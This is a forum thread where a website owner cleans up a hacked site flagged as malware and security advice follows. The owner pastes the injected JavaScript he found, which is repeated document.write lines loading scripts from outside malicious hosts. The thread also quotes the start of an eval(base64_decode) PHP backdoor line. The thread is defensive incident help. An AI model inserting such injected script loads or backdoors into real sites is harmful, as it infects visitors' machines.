Hi,
Yesterday i received an email from google that my website irfanbukhari.com is reported as malware. when i checked through firefox (i have a script blocker) i could see jn06.nl listed in the blocked sites list. so i downloaded my index.php file and i saw that it had some code add in the begining in php tags. it was encoded to i dont really know what it was. So i removed the code and uploaded the file again. I also asked google to recheck it. but this morning when i opened my site again i could see the same site jn06.nl in my script blocker list. Please tell me how i can get rid of this. thanks.
In addition to removing the malicious code, it is necessary to discover how the hacker got access to your server to put the code there. If you don’t close the security hole, they’ll add malicious code over and over again. These two articles will help, and the others that they link to give background information if you need to understand the situation better:
How to prevent your site from getting hacked, repair damaged site. Website security precautions:
http://25yearsofprogramming.com/blog/20070705.htm
How to remove ‘This site may harm your computer’ from your website’s Google results:
http://25yearsofprogramming.com/blog/20071223.htm
Chances are the php code you found at the beginning of the file was only the infection method, not necessarily the infection itself.
Recently, I’ve been seeing more and more sites with .php files where the remote control code has been placed at the first line, usually before the original opening php tag.
The code you found probably started with:
<?php eval(base64_decode('aWYo
this typically is used to re-infect sites with malscripts found elsewhere.
Some of the most common places hackers are injecting their malscripts are:
Index files (this includes .php, .html, .htm, .whatever)
Look both before and after the opening body tag. It may be on the same line as the opening body tag.
Look at the very end of the file. Many times I’m seeing malscripts injected after the closing html tag.
Once you find one file with the malscript, check files modified around the same date and time too. Although I just wrote a blog post about this:
http://www.wewatchyourwebsite.com/wordpress/?p=305
but checking for files modified around the same time may at least give you a jump start.
Let the forum here know what you find please.
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
thanks alot Steve and WeWatch. your links actually did help me find out what was wrong. u were right the eval thingi in the beginning of the file wasnt the only problem. i had
document.write(‘<script src=http://teessidetrailerhire.co.uk/images/google37c8afdcff39305a.php ><\/script>’);
document.write(‘<script src=http://teessidetrailerhire.co.uk/images/google37c8afdcff39305a.php ><\/script>’);
document.write(‘<script src=http://teessidetrailerhire.co.uk/images/google37c8afdcff39305a.php ><\/script>’);
document.write(‘<script src=http://jn06.nl/countdown/wp-config.php ><\/script>’);
document.write(‘<script src=http://jn06.nl/countdown/wp-config.php ><\/script>’);
document.write(‘<script src=http://jn06.nl/countdown/wp-config.php ><\/script>’);
document.write(‘<script src=http://jn06.nl/countdown/wp-config.php ><\/script>’);
document.write(‘<script src=http://jn06.nl/countdown/wp-config.php ><\/script>’);
document.write(‘<script src=http://jn06.nl/countdown/wp-config.php ><\/script>’);
document.write(‘<script src=http://jn06.nl/countdown/wp-config.php ><\/script>’);
document.write(‘<script src=http://jn06.nl/countdown/wp-config.php ><\/script>’);
this code included in my jquery js file and the tooltip (jquery plugin) js file. now i have removed it. But i still dont know for sure how this was added. i think someone hacked into my blog (wordpress…removed it now.) and through comments somehow got all this done. because i have been receiving emails of dummy comments. but its a wild guess.
If you think it’s Wordpress, are you fully updated? There’s a new version out 2.8.6. Unless you’re running an older version, I don’t think it’s Wordpress. Are you using the Wordpress SPAM plugin?
Typically this type of attack starts with stolen FTP login credentials. Someone with FTP access to the infected website has a virus on their PC. The virus/trojan is designed to steal FTP login credentials.
You can read Denis’ excellent write-up about various FTP programs that allow hackers to easily steal this information. His blog post is here:
I’ve also seen where these viruses/trojans will “sniff” the outgoing FTP traffic. Since FTP transmits all data in plain text, it’s easy for the virus to steal the FTP login credentials this way.
So, please don’t be in denial, change all FTP passwords immediately then scan all PCs with FTP access for viruses. Sometimes the viruses/trojans learn how to evade detection of the currently installed anti-virus program. This means you’ll have to install something different.
Many have had good success with AVG, Avast or Avira. Use one of these with Malwarebytes and you should be able to find and remove any viruses.
Please post back here with what you used to remove the viruses and what was found. That way others who read this thread will learn as well.
If you have further questions, please post back here and someone will help you.
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com